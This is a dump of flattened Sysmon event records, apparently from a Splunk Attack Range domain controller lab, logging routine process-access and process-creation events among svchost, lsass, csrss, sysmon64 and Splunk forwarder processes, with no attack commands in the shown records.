13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EF0-6005-E700-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EF0-6005-E700-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8EF0-6005-E700-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:48.315{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.315{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:48.127{59A5CD1D-8EEF-6005-E600-00000000A301}43121752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.924{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EF1-6005-E900-00000000A301}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:49.909{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EF1-6005-E900-00000000A301}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:49.909{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program 